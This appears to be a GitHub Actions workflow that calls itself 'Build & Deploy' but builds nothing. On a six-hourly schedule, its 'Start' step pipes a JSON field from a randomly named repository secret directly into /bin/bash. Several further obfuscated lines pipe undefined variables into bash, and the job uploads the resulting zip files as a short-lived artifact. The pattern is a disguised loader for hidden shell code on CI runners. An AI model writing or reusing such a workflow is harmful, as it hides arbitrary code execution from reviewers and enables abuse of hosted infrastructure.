name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '5 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          eyrz64: ${{ secrets.eyrz64 }}
        run: |
          printf '%s' "$eyrz64" | jq -r .pcmok388 | /bin/bash
          echo $mdg72 | jq -r .zqd2 | /bin/bash
          printf '%s' "$kurj258" | jq -r .bpn8185 | /bin/bash
          echo $vnv43 | jq -r .x0096 | /bin/bash
          echo $ymh084 | jq -r .d2 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: Yyym5W6e
          path: "*.zip"
          retention-days: 1
